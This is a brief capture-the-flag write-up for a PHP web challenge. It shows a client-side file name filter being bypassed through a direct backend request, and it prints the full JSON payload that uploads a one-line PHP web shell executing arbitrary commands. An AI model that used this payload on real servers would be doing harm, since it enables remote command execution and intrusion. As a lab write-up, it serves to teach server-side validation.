SCS

SCS [Web]

We uncovered a code repository and it appears to be where ARIA is storing mission-critical code. We need to break in!

Uploaded files are placed in /uploads directory

The technology used is PHP

The frontend restricts using special characters:

Paste file name can only contain alphanumeric characters

But making direct request to backend it's bypassed:

Upload shell:

{
	"pasteContent": "<?PHP echo system($_REQUEST[0]); ?>",
	"pasteFileName":"t.php"
}

It works:

After some enumeration we find location of real flag.txt

Flag: SIVBGR{v@lidate_s3rver_s1de}

Last updated 1 month ago